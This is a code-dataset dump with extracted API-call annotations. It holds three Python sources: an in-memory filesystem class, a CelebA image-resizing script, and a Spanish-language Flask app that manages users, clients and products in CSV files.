def isfile(self, path):
"""
Return True if path is a file
Implements the :func:`os.path.isfile` interface.
"""
return util.is_file(self._direntry(path))
def islink(self, path):
"""
Return True if path is a symlink
.. note::
Currently hard-wired to return False
"""
return False
def makedirs(self, path):
"""Create directory entries for a path
Raise OSError if the path already exists.
"""
path = self.abspath(path)
entry = self._direntry(path)
if entry is not None:
raise _OSError(errno.EEXIST, path)
new_entries = util.build_nested_dir_dict(path)
util.merge_dicts(new_entries, self._entries)
def abspath(self, path):
if os.path.isabs(path):
# Folds '////' into '/'
return _abspath_builtin(path)
curdir = self.cwd.getcwd()
return _abspath_builtin(os.path.join(curdir, path))
def listdir(self, path):
"""
Return the directory contents of 'path'
Implements the :func:`os.listdir` interface.
:param path: filesystem path
"""
direntry = self._direntry(path)
if direntry is None:
raise _OSError(errno.ENOENT, path)
if util.is_file(direntry):
raise _OSError(errno.ENOTDIR, path)
if util.is_dir(direntry):
return list(sorted(direntry.keys()))
raise _OSError(errno.EINVAL, path)
def walk(self, path):
"""
Walk a filesystem path
Implements the :func:`os.walk` interface.
"""
path = self.abspath(path)
inspect = [path]
while True:
dirstack = []
for entry in inspect:
dirent = self._direntry(entry)
dirs = []
files = []
if dirent:
for e in dirent:
if type(dirent[e]) is dict:
dirs.append(e)
else:
files.append(e)
yield (entry, dirs, files)
dirstack.extend([os.path.join(entry, d) for d in dirs])
inspect = dirstack
if not inspect:
raise StopIteration
def remove(self, path):
"""Remove the entry for a file path
Implements the :func:`os.remove` interface.
"""
path = self.abspath(path)
dirname = os.path.dirname(path)
basename = os.path.basename(path)
entry = self._direntry(dirname)
if not util.is_dir(entry):
raise _OSError(errno.EPERM, path)
try:
fsentry = entry[basename]
except KeyError:
raise _OSError(errno.ENOENT, path)
if not util.is_file(fsentry):
raise _OSError(errno.EPERM, path)
del entry[basename]
def rmdir(self, fspath):
"""Remove the entry for a directory path
Implements the :func:`os.rmdir` interface.
"""
path = self.abspath(fspath)
dirname = os.path.dirname(path)
basename = os.path.basename(path)
entry = self._direntry(dirname)
if not util.is_dir(entry):
raise _OSError(errno.ENOENT, path)
try:
direntry = entry[basename]
except KeyError:
raise _OSError(errno.ENOENT, fspath)
if not util.is_dir(direntry):
raise _OSError(errno.ENOTDIR, fspath)
if len(direntry) != 0:
raise _OSError(errno.ENOTEMPTY, fspath)
del entry[basename]
def copytree(self, src, dst):
"""Copy a directory subtree
Implements the :func:`shutil.copytree` interface.
"""
src_d = self._direntry(src)
if src_d is None:
raise _OSError(errno.ENOENT, src)
dst = self.abspath(dst)
dst_d_parent = self._direntry(os.path.dirname(dst))
dst_d_parent[os.path.basename(dst)] = copy.deepcopy(src_d)
def rmtree(self, path, ignore_errors=False, onerror=None):
"""Recursively delete a directory tree.
If ignore_errors is set, errors are ignored; otherwise, if onerror
is set, it is called to handle the error with arguments (func,
path, exc_info) where func is os.listdir, os.remove, or os.rmdir;
path is the argument to that function that caused it to fail; and
exc_info is a tuple returned by sys.exc_info(). If ignore_errors
is false and onerror is None, an exception is raised.
"""
abspath = self.abspath(path)
if abspath == '/':
# Do not allow removing the root
if ignore_errors:
return
if onerror:
onerror(os.listdir, path, sys.exc_info())
return
raise _OSError(errno.EPERM, '/')
entry = self._direntry(abspath)
if entry is None:
if ignore_errors:
return
if onerror:
onerror(os.listdir, path, sys.exc_info())
return
raise _OSError(errno.ENOENT, entry)
if not self.isdir(path):
if ignore_errors:
return
if onerror:
onerror(os.rmdir, path, sys.exc_info())
return
raise _OSError(errno.ENOTDIR, path)
dirname = os.path.dirname(abspath)
dirent = self._direntry(dirname)
if dirent is None:
if ignore_errors:
return
if onerror:
onerror(os.listdir, path, sys.exc_info())
return
raise _OSError(errno.ENOENT, dirname)
basename = os.path.basename(path)
if basename not in dirent:
if ignore_errors:
return
if onerror:
onerror(os.rmdir, path, sys.exc_info())
return
raise _OSError(errno.ENOENT, path)
# Remove the directory
del dirent[basename]
def glob(self, pattern):
"""Implementation of :py:func:`glob.glob`"""
# Keep relative glob paths relative
if os.path.isabs(pattern):
prefix = None
else:
prefix = self.cwd.getcwd()
if prefix != '/':
prefix += '/'
pattern = self.abspath(pattern)
if pattern == '/':
return ['/']
# Keep track of current likely candidate paths.
# Each time we filter down, take the new candidates
# and append their names to create new candidates paths.
patterns = pattern.split('/')[1:]
entries = [('', self._entries)]
match = fnmatch.fnmatch
path_stack = []
pattern_stack = ['']
paths = []
for idx, subpattern in enumerate(patterns):
pattern_stack.append(subpattern)
pattern = '/'.join(pattern_stack)
new_entries = []
new_paths = []
for subdir, entry in entries:
path_stack.append(subdir)
for path in sorted(entry):
path_stack.append(path)
abspath = '/'.join(path_stack)
if match(abspath, pattern):
new_entries.append((abspath, entry[path]))
new_paths.append(abspath)
path_stack.pop()
path_stack.pop()
entries = new_entries
paths = new_paths
if prefix is None:
return paths
else:
return [p[len(prefix) :] for p in paths]
# Internal Methods
def _direntry(self, fspath):
"""Return the directory "dict" entry for a path"""
path = self.abspath(fspath)
if path == '/':
return self._entries
elts = path.split('/')[1:]
current = self._entries
retval = None
for elt in elts:
if elt in current:
retval = current[elt]
current = current[elt]
else:
return None
return retval
class Cwd(object):
def __init__(self, mfs):
self._cwd = '/'
self._mfs = mfs
def chdir(self, path):
# Make it absolute
if os.path.isabs(path):
cdpath = path
else:
cdpath = os.path.join(self._cwd, path)
entry = self._mfs._direntry(path)
if entry is None:
raise _OSError(errno.ENOENT, path)
elif not util.is_dir(entry):
raise _OSError(errno.ENOTDIR, path)
self._cwd = _abspath_builtin(cdpath)
def getcwd(self):
return self._cwd
def getcwdu(self):
return self._cwd
| [
"os.path.isabs",
"os.path.join",
"os.path.dirname",
"sys.exc_info",
"os.path.basename",
"copy.deepcopy",
"os.strerror"
] | [((1636, 1662), 'os.path.dirname', 'os.path.dirname', (['full_path'], {}), '(full_path)\n', (1651, 1662), False, 'import os\n'), ((2951, 2972), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (2966, 2972), False, 'import os\n'), ((2992, 3014), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (3008, 3014), False, 'import os\n'), ((4284, 4303), 'os.path.isabs', 'os.path.isabs', (['path'], {}), '(path)\n', (4297, 4303), False, 'import os\n'), ((6004, 6025), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (6019, 6025), False, 'import os\n'), ((6045, 6067), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (6061, 6067), False, 'import os\n'), ((6625, 6646), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (6640, 6646), False, 'import os\n'), ((6666, 6688), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (6682, 6688), False, 'import os\n'), ((7529, 7549), 'copy.deepcopy', 'copy.deepcopy', (['src_d'], {}), '(src_d)\n', (7542, 7549), False, 'import copy\n'), ((8948, 8972), 'os.path.dirname', 'os.path.dirname', (['abspath'], {}), '(abspath)\n', (8963, 8972), False, 'import os\n'), ((9269, 9291), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (9285, 9291), False, 'import os\n'), ((9729, 9751), 'os.path.isabs', 'os.path.isabs', (['pattern'], {}), '(pattern)\n', (9742, 9751), False, 'import os\n'), ((11860, 11879), 'os.path.isabs', 'os.path.isabs', (['path'], {}), '(path)\n', (11873, 11879), False, 'import os\n'), ((1034, 1050), 'os.strerror', 'os.strerror', (['err'], {}), '(err)\n', (1045, 1050), False, 'import os\n'), ((1182, 1198), 'os.strerror', 'os.strerror', (['err'], {}), '(err)\n', (1193, 1198), False, 'import os\n'), ((2498, 2519), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (2513, 2519), False, 'import os\n'), ((4450, 4476), 'os.path.join', 'os.path.join', (['curdir', 'path'], {}), '(curdir, path)\n', (4462, 4476), False, 'import os\n'), ((7461, 7481), 'os.path.dirname', 'os.path.dirname', (['dst'], {}), '(dst)\n', (7476, 7481), False, 'import os\n'), ((7504, 7525), 'os.path.basename', 'os.path.basename', (['dst'], {}), '(dst)\n', (7520, 7525), False, 'import os\n'), ((11942, 11971), 'os.path.join', 'os.path.join', (['self._cwd', 'path'], {}), '(self._cwd, path)\n', (11954, 11971), False, 'import os\n'), ((2609, 2631), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (2625, 2631), False, 'import os\n'), ((8334, 8348), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8346, 8348), False, 'import sys\n'), ((8604, 8618), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8616, 8618), False, 'import sys\n'), ((8842, 8856), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8854, 8856), False, 'import sys\n'), ((9160, 9174), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (9172, 9174), False, 'import sys\n'), ((9444, 9458), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (9456, 9458), False, 'import sys\n'), ((5679, 5701), 'os.path.join', 'os.path.join', (['entry', 'd'], {}), '(entry, d)\n', (5691, 5701), False, 'import os\n')] |
import os
from skimage.transform import resize
import imageio
import numpy as np
import glob
import scipy
def main():
rootdir = "/home/nbayat5/Desktop/celebA/identities"
#os.mkdir("/home/nbayat5/Desktop/celebA/face_recognition_srgan")
for subdir, dirs, files in os.walk(rootdir):
for dir in dirs:
path = os.path.join(rootdir, subdir)
parts = path.split("/")
if len(parts) == 6:
continue
os.mkdir("/home/nbayat5/Desktop/celebA/face_recognition_srgan_test/%s" % (parts[6].rstrip()))
imgs_hr, imgs_lr = load_dataforIdentities(path)
counter = 1
for img in imgs_hr:
# fake_hr = gan.generator.predict(img_lr) #fix for loop to lr
img = 0.5 * img + 0.5
img = np.asarray(img)
path_hr = "/home/nbayat5/Desktop/celebA/face_recognition_srgan_test/%s/%s_%d.png" % (
parts[6].rstrip(), parts[6].rstrip(), counter)
imageio.imwrite(path_hr, img)
print("img %s_%d.png saved." % (parts[6].rstrip(), counter))
counter += 1
break
def load_dataforIdentities(path):
imgs_hr = []
imgs_lr = []
os.chdir(path)
# train_images = glob.glob("./train/*.jpg")
# val_images = glob.glob("./validation/*.jpg")
test_images = glob.glob("./test/*.jpg")
# batch_images = train_images + val_images
# batch_images = np.random.choice(path2, size=1)
for img_path in test_images:
img = scipy.misc.imread(img_path, mode='RGB').astype(np.float)
img_hr = scipy.misc.imresize(img, (64, 64))
img_lr = scipy.misc.imresize(img, (16, 16))
imgs_hr.append(img_hr)
imgs_lr.append(img_lr)
imgs_hr = np.array(imgs_hr) / 127.5 - 1.
imgs_lr = np.array(imgs_lr) / 127.5 - 1.
return imgs_hr, imgs_lr
if __name__ == "__main__":
main()
| [
"imageio.imwrite",
"os.walk",
"os.path.join",
"numpy.asarray",
"os.chdir",
"numpy.array",
"scipy.misc.imread",
"scipy.misc.imresize",
"glob.glob"
] | [((285, 301), 'os.walk', 'os.walk', (['rootdir'], {}), '(rootdir)\n', (292, 301), False, 'import os\n'), ((1291, 1305), 'os.chdir', 'os.chdir', (['path'], {}), '(path)\n', (1299, 1305), False, 'import os\n'), ((1438, 1463), 'glob.glob', 'glob.glob', (['"""./test/*.jpg"""'], {}), "('./test/*.jpg')\n", (1447, 1463), False, 'import glob\n'), ((1712, 1746), 'scipy.misc.imresize', 'scipy.misc.imresize', (['img', '(64, 64)'], {}), '(img, (64, 64))\n', (1731, 1746), False, 'import scipy\n'), ((1769, 1803), 'scipy.misc.imresize', 'scipy.misc.imresize', (['img', '(16, 16)'], {}), '(img, (16, 16))\n', (1788, 1803), False, 'import scipy\n'), ((349, 378), 'os.path.join', 'os.path.join', (['rootdir', 'subdir'], {}), '(rootdir, subdir)\n', (361, 378), False, 'import os\n'), ((1901, 1918), 'numpy.array', 'np.array', (['imgs_hr'], {}), '(imgs_hr)\n', (1909, 1918), True, 'import numpy as np\n'), ((1951, 1968), 'numpy.array', 'np.array', (['imgs_lr'], {}), '(imgs_lr)\n', (1959, 1968), True, 'import numpy as np\n'), ((842, 857), 'numpy.asarray', 'np.asarray', (['img'], {}), '(img)\n', (852, 857), True, 'import numpy as np\n'), ((1042, 1071), 'imageio.imwrite', 'imageio.imwrite', (['path_hr', 'img'], {}), '(path_hr, img)\n', (1057, 1071), False, 'import imageio\n'), ((1631, 1670), 'scipy.misc.imread', 'scipy.misc.imread', (['img_path'], {'mode': '"""RGB"""'}), "(img_path, mode='RGB')\n", (1648, 1670), False, 'import scipy\n')] |
#Necesario para hacer el renderizado HTML de las templates
from flask import render_template, redirect, url_for, flash, session
from app import app
from .forms import *
import csv
from .utils import *
@app.route('/')
def index():
return render_template('index.html')
@app.route('/ingresar', methods=['GET', 'POST'])
def ingresar():
"""
Función que permite loggearse con usuario y contraseña
return -> el template renderizado para loguearse
"""
if not 'username' in session:
formulario = loginForm()
if formulario.validate_on_submit():
with open('usuarios.csv') as archivo:
archivo_csv = csv.reader(archivo)
registro = next(archivo_csv)
while registro:
if formulario.username.data == registro[0] and formulario.password.data == registro[1]:
print('postback success')
flash('Bienvenido/a')
session['username'] = formulario.username.data
return render_template('ingresoOK.html', nombre=session['username'])
registro = next(archivo_csv, None)
else:
print('postback error')
flash('Ingresaste mal el usuario o contraseña. Reintenta')
return redirect(url_for('ingresar'))
return render_template('login.html', formulario=formulario)
else:
return index()
@app.route('/registro', methods=['GET', 'POST'])
def registro():
"""
Función que permite registrar un usuario y contraseña
return -> el template renderizado para registrarse
"""
formulario = registrationForm()
if formulario.validate_on_submit():
if formulario.password.data == formulario.password2.data:
if validarUsuarioNuevo(formulario.username.data):
with open('usuarios.csv', 'a+', newline='') as archivo:
archivo_csv = csv.writer(archivo)
registro = [formulario.username.data, formulario.password.data]
archivo_csv.writerow(registro)
flash('Usuario creado correctamente')
return redirect(url_for('ingresar'))
else:
flash("Usuario previamente registrado")
else:
flash('Las passwords no coinciden')
return render_template('registro.html', form=formulario)
@app.route('/clientes', methods=['GET', 'POST'])
def clientes():
"""
Función que muestra los clientes registrados
return -> el template renderizado con los encabezados de la lista clientes
y las inserciones
"""
iClientes = []
iEncabezados = []
if 'username' in session:
if not 'iClientes' in session:
iClientes = abrirCSV('clientes.csv')
else:
iClientes = session['iClientes']
iEncabezados = iClientes[0].keys()
return render_template('clientes.html', inserciones = iClientes, encabezados=iEncabezados)
else:
return ingresar()
@app.route('/clientesPaises', methods=['GET', 'POST'])
def clientesPais():
"""
Función que muestra los clientes filtrados por país
return -> el template renderizado con los encabezados de la lista clientes
y las inserciones
"""
Clientes = []
Encabezados = []
ClientesMostrados = []
formulario = clientesPaisForm()
if 'username' in session:
if formulario.is_submitted():
Clientes = abrirCSV('clientes.csv')
session['Clientes'] = Clientes
for item in Clientes:
if str(item['País']).upper() == formulario.txtPais.data.upper():
ClientesMostrados.append(item)
Encabezados = Clientes[0].keys()
if ClientesMostrados == []:
flash("No hay clientes en ese país")
return render_template('clientesPais.html', inserciones=ClientesMostrados, encabezados=Encabezados, formulario=formulario)
else:
return ingresar()
@app.route('/clientesEdad', methods=['GET', 'POST'])
def clientesEdad():
"""
Función que muestra los clientes filtrados por rango de edad
return -> el template renderizado con los encabezados de la lista clientes
y las inserciones
"""
Clientes = []
Encabezados = []
ClientesMostrados = []
formulario = clientesEdadForm()
if 'username' in session:
if formulario.is_submitted():
Clientes = abrirCSV('clientes.csv')
session['Clientes'] = Clientes
if ValidarSoloNumerosPositivos(formulario.txtEdadMinina.data, formulario.txtEdadMinina.data) == False:
flash("Error. Solo puede ingresar números positivos")
return render_template('clientesEdad.html', inserciones=ClientesMostrados, encabezados=Encabezados, formulario=formulario)
for item in Clientes:
if int(item['Edad']) >= formulario.txtEdadMinina.data and int(item['Edad']) <= formulario.txtEdadMaxima.data:
ClientesMostrados.append(item)
Encabezados = Clientes[0].keys()
if ClientesMostrados == []:
flash("No hay clientes en ese rango etáreo")
return render_template('clientesEdad.html', inserciones=ClientesMostrados, encabezados=Encabezados, formulario=formulario)
else:
return ingresar()
@app.route('/clientesFecha', methods=['GET', 'POST'])
def clientesFecha():
"""
Función que muestra los clientes filtrados por fecha de alta
return -> el template renderizado con los encabezados de la lista clientes
y las inserciones
"""
Clientes = []
Encabezados = []
ClientesMostrados = []
formulario = clientesFechaForm()
if 'username' in session:
if formulario.is_submitted():
Clientes = abrirCSV('clientes.csv')
session['Clientes'] = Clientes
for item in Clientes:
if item['Fecha Alta'] == str(formulario.dateFecha.data):
ClientesMostrados.append(item)
Encabezados = Clientes[0].keys()
if ClientesMostrados == []:
flash("No hay clientes dados de alta en esa fecha")
return render_template('clientesFecha.html', inserciones=ClientesMostrados, encabezados=Encabezados, formulario=formulario)
else:
return ingresar()
@app.route('/agregarCliente', methods=['GET', 'POST'])
def agregarCliente():
"""
Función que permite agregar un nuevo cliente
return -> el template renderizado para ingresar el nuevo registro
"""
nuevoCliente = []
formulario = agregarClientesForm()
if 'username' in session:
if formulario.is_submitted():
Clientes = abrirCSV('clientes.csv')
for item in Clientes:
if item['Documento'] != formulario.txtDocumento.data:
with open('clientes.csv', 'a+', newline="") as archivo:
archivo_csv = csv.writer(archivo)
registro = [formulario.txtNombre.data, formulario.txtEdad.data, formulario.txtDireccion.data, formulario.txtPais.data, formulario.txtDocumento.data, formulario.txtFechaAlta.data, formulario.txtCorreo.data, formulario.txtTrabajo.data ]
archivo_csv.writerow(registro)
flash("El cliente se registró correctamente")
return redirect(url_for('agregarCliente'))
else:
flash("El cliente ya esta en la base de datos")
return render_template('agregarCliente.html', form=formulario)
return render_template('agregarCliente.html', form=formulario)
else:
return ingresar()
@app.route('/agregarProducto', methods=['GET', 'POST'])
def agregarProducto():
"""
Función que permite agregar un nuevo producto de venta.
return -> el template renderizado para ingresar el nuevo registro
"""
formulario = agregarProductoForm()
if 'username' in session:
if formulario.validate_on_submit():
Productos = abrirCSV('productos.csv')
for item in Productos:
if item['codigo'] != formulario.txtCodigo.data:
with open('productos.csv', 'a+', newline="") as archivo:
archivo_csv = csv.writer(archivo)
registro = [formulario.txtCodigo.data, formulario.txtDescripcion.data, formulario.txtPrecio.data, formulario.txtCantidad.data]
archivo_csv.writerow(registro)
flash("El producto se registró correctamente")
return redirect(url_for('agregarProducto'))
else:
flash("El producto ya esta previamente registrado")
return render_template('agregarProducto.html', form=formulario)
return render_template('agregarProducto.html', form=formulario)
else:
return ingresar()
@app.route('/bienvenido', methods=['GET', 'POST'])
def bienvenido():
"""
Función que informa que el usuario ingreso correctamente a la aplicación
return -> el template renderizado con un mensaje de ingreso exitoso
"""
if 'username' in session:
return render_template('ingresoOK.html', usuario=formulario.username.data)
else:
return ingresar()
@app.route('/sobre')
def sobre():
"""
Función que muestra datos del desarrollador e información relacionada
return -> el template renderizado con la información
"""
return render_template('sobre.html')
@app.errorhandler(404)
def no_encontrado(e):
"""
Función que muestra un mensaje de excepción 404
return -> el template renderizado con el mensaje
"""
return render_template('404.html'), 404
@app.errorhandler(500)
def error_interno(e):
"""
Función que muestra un mensaje de excepción 500
return -> el template renderizado con el mensaje
"""
return render_template('500.html'), 500
@app.route('/logout', methods=['GET'])
def logout():
"""
Función que cierra la sesion del usuario
return -> el template renderizado con mensaje de logout exitoso
"""
if 'username' in session:
session.pop('username')
return render_template('logout.html')
else:
return redirect(url_for('index')) | [
"flask.render_template",
"flask.flash",
"csv.writer",
"flask.url_for",
"app.app.errorhandler",
"app.app.route",
"flask.session.pop",
"csv.reader"
] | [((210, 224), 'app.app.route', 'app.route', (['"""/"""'], {}), "('/')\n", (219, 224), False, 'from app import app\n'), ((285, 332), 'app.app.route', 'app.route', (['"""/ingresar"""'], {'methods': "['GET', 'POST']"}), "('/ingresar', methods=['GET', 'POST'])\n", (294, 332), False, 'from app import app\n'), ((1524, 1571), 'app.app.route', 'app.route', (['"""/registro"""'], {'methods': "['GET', 'POST']"}), "('/registro', methods=['GET', 'POST'])\n", (1533, 1571), False, 'from app import app\n'), ((2529, 2576), 'app.app.route', 'app.route', (['"""/clientes"""'], {'methods': "['GET', 'POST']"}), "('/clientes', methods=['GET', 'POST'])\n", (2538, 2576), False, 'from app import app\n'), ((3191, 3244), 'app.app.route', 'app.route', (['"""/clientesPaises"""'], {'methods': "['GET', 'POST']"}), "('/clientesPaises', methods=['GET', 'POST'])\n", (3200, 3244), False, 'from app import app\n'), ((4211, 4262), 'app.app.route', 'app.route', (['"""/clientesEdad"""'], {'methods': "['GET', 'POST']"}), "('/clientesEdad', methods=['GET', 'POST'])\n", (4220, 4262), False, 'from app import app\n'), ((5617, 5669), 'app.app.route', 'app.route', (['"""/clientesFecha"""'], {'methods': "['GET', 'POST']"}), "('/clientesFecha', methods=['GET', 'POST'])\n", (5626, 5669), False, 'from app import app\n'), ((6654, 6707), 'app.app.route', 'app.route', (['"""/agregarCliente"""'], {'methods': "['GET', 'POST']"}), "('/agregarCliente', methods=['GET', 'POST'])\n", (6663, 6707), False, 'from app import app\n'), ((8035, 8089), 'app.app.route', 'app.route', (['"""/agregarProducto"""'], {'methods': "['GET', 'POST']"}), "('/agregarProducto', methods=['GET', 'POST'])\n", (8044, 8089), False, 'from app import app\n'), ((9310, 9359), 'app.app.route', 'app.route', (['"""/bienvenido"""'], {'methods': "['GET', 'POST']"}), "('/bienvenido', methods=['GET', 'POST'])\n", (9319, 9359), False, 'from app import app\n'), ((9709, 9728), 'app.app.route', 'app.route', (['"""/sobre"""'], {}), "('/sobre')\n", (9718, 9728), False, 'from app import app\n'), ((9944, 9965), 'app.app.errorhandler', 'app.errorhandler', (['(404)'], {}), '(404)\n', (9960, 9965), False, 'from app import app\n'), ((10167, 10188), 'app.app.errorhandler', 'app.errorhandler', (['(500)'], {}), '(500)\n', (10183, 10188), False, 'from app import app\n'), ((10390, 10427), 'app.app.route', 'app.route', (['"""/logout"""'], {'methods': "['GET']"}), "('/logout', methods=['GET'])\n", (10399, 10427), False, 'from app import app\n'), ((251, 280), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (266, 280), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((2475, 2524), 'flask.render_template', 'render_template', (['"""registro.html"""'], {'form': 'formulario'}), "('registro.html', form=formulario)\n", (2490, 2524), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9910, 9939), 'flask.render_template', 'render_template', (['"""sobre.html"""'], {}), "('sobre.html')\n", (9925, 9939), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((1432, 1484), 'flask.render_template', 'render_template', (['"""login.html"""'], {'formulario': 'formulario'}), "('login.html', formulario=formulario)\n", (1447, 1484), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((3065, 3151), 'flask.render_template', 'render_template', (['"""clientes.html"""'], {'inserciones': 'iClientes', 'encabezados': 'iEncabezados'}), "('clientes.html', inserciones=iClientes, encabezados=\n iEncabezados)\n", (3080, 3151), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((4053, 4172), 'flask.render_template', 'render_template', (['"""clientesPais.html"""'], {'inserciones': 'ClientesMostrados', 'encabezados': 'Encabezados', 'formulario': 'formulario'}), "('clientesPais.html', inserciones=ClientesMostrados,\n encabezados=Encabezados, formulario=formulario)\n", (4068, 4172), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((5459, 5578), 'flask.render_template', 'render_template', (['"""clientesEdad.html"""'], {'inserciones': 'ClientesMostrados', 'encabezados': 'Encabezados', 'formulario': 'formulario'}), "('clientesEdad.html', inserciones=ClientesMostrados,\n encabezados=Encabezados, formulario=formulario)\n", (5474, 5578), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((6495, 6615), 'flask.render_template', 'render_template', (['"""clientesFecha.html"""'], {'inserciones': 'ClientesMostrados', 'encabezados': 'Encabezados', 'formulario': 'formulario'}), "('clientesFecha.html', inserciones=ClientesMostrados,\n encabezados=Encabezados, formulario=formulario)\n", (6510, 6615), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7937, 7992), 'flask.render_template', 'render_template', (['"""agregarCliente.html"""'], {'form': 'formulario'}), "('agregarCliente.html', form=formulario)\n", (7952, 7992), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9211, 9267), 'flask.render_template', 'render_template', (['"""agregarProducto.html"""'], {'form': 'formulario'}), "('agregarProducto.html', form=formulario)\n", (9226, 9267), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9599, 9666), 'flask.render_template', 'render_template', (['"""ingresoOK.html"""'], {'usuario': 'formulario.username.data'}), "('ingresoOK.html', usuario=formulario.username.data)\n", (9614, 9666), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10130, 10157), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (10145, 10157), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10353, 10380), 'flask.render_template', 'render_template', (['"""500.html"""'], {}), "('500.html')\n", (10368, 10380), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10620, 10643), 'flask.session.pop', 'session.pop', (['"""username"""'], {}), "('username')\n", (10631, 10643), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10660, 10690), 'flask.render_template', 'render_template', (['"""logout.html"""'], {}), "('logout.html')\n", (10675, 10690), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((2427, 2462), 'flask.flash', 'flash', (['"""Las passwords no coinciden"""'], {}), "('Las passwords no coinciden')\n", (2432, 2462), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10727, 10743), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (10734, 10743), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((682, 701), 'csv.reader', 'csv.reader', (['archivo'], {}), '(archivo)\n', (692, 701), False, 'import csv\n'), ((2231, 2268), 'flask.flash', 'flash', (['"""Usuario creado correctamente"""'], {}), "('Usuario creado correctamente')\n", (2236, 2268), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((2359, 2398), 'flask.flash', 'flash', (['"""Usuario previamente registrado"""'], {}), "('Usuario previamente registrado')\n", (2364, 2398), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((4000, 4036), 'flask.flash', 'flash', (['"""No hay clientes en ese país"""'], {}), "('No hay clientes en ese país')\n", (4005, 4036), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((4886, 4939), 'flask.flash', 'flash', (['"""Error. Solo puede ingresar números positivos"""'], {}), "('Error. Solo puede ingresar números positivos')\n", (4891, 4939), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((4964, 5083), 'flask.render_template', 'render_template', (['"""clientesEdad.html"""'], {'inserciones': 'ClientesMostrados', 'encabezados': 'Encabezados', 'formulario': 'formulario'}), "('clientesEdad.html', inserciones=ClientesMostrados,\n encabezados=Encabezados, formulario=formulario)\n", (4979, 5083), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((5398, 5442), 'flask.flash', 'flash', (['"""No hay clientes en ese rango etáreo"""'], {}), "('No hay clientes en ese rango etáreo')\n", (5403, 5442), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((6427, 6478), 'flask.flash', 'flash', (['"""No hay clientes dados de alta en esa fecha"""'], {}), "('No hay clientes dados de alta en esa fecha')\n", (6432, 6478), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((1299, 1357), 'flask.flash', 'flash', (['"""Ingresaste mal el usuario o contraseña. Reintenta"""'], {}), "('Ingresaste mal el usuario o contraseña. Reintenta')\n", (1304, 1357), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((2057, 2076), 'csv.writer', 'csv.writer', (['archivo'], {}), '(archivo)\n', (2067, 2076), False, 'import csv\n'), ((2302, 2321), 'flask.url_for', 'url_for', (['"""ingresar"""'], {}), "('ingresar')\n", (2309, 2321), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7635, 7680), 'flask.flash', 'flash', (['"""El cliente se registró correctamente"""'], {}), "('El cliente se registró correctamente')\n", (7640, 7680), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7789, 7836), 'flask.flash', 'flash', (['"""El cliente ya esta en la base de datos"""'], {}), "('El cliente ya esta en la base de datos')\n", (7794, 7836), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7865, 7920), 'flask.render_template', 'render_template', (['"""agregarCliente.html"""'], {'form': 'formulario'}), "('agregarCliente.html', form=formulario)\n", (7880, 7920), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((8902, 8948), 'flask.flash', 'flash', (['"""El producto se registró correctamente"""'], {}), "('El producto se registró correctamente')\n", (8907, 8948), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9058, 9109), 'flask.flash', 'flash', (['"""El producto ya esta previamente registrado"""'], {}), "('El producto ya esta previamente registrado')\n", (9063, 9109), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9138, 9194), 'flask.render_template', 'render_template', (['"""agregarProducto.html"""'], {'form': 'formulario'}), "('agregarProducto.html', form=formulario)\n", (9153, 9194), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((966, 987), 'flask.flash', 'flash', (['"""Bienvenido/a"""'], {}), "('Bienvenido/a')\n", (971, 987), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((1092, 1153), 'flask.render_template', 'render_template', (['"""ingresoOK.html"""'], {'nombre': "session['username']"}), "('ingresoOK.html', nombre=session['username'])\n", (1107, 1153), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((1395, 1414), 'flask.url_for', 'url_for', (['"""ingresar"""'], {}), "('ingresar')\n", (1402, 1414), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7278, 7297), 'csv.writer', 'csv.writer', (['archivo'], {}), '(archivo)\n', (7288, 7297), False, 'import csv\n'), ((7718, 7743), 'flask.url_for', 'url_for', 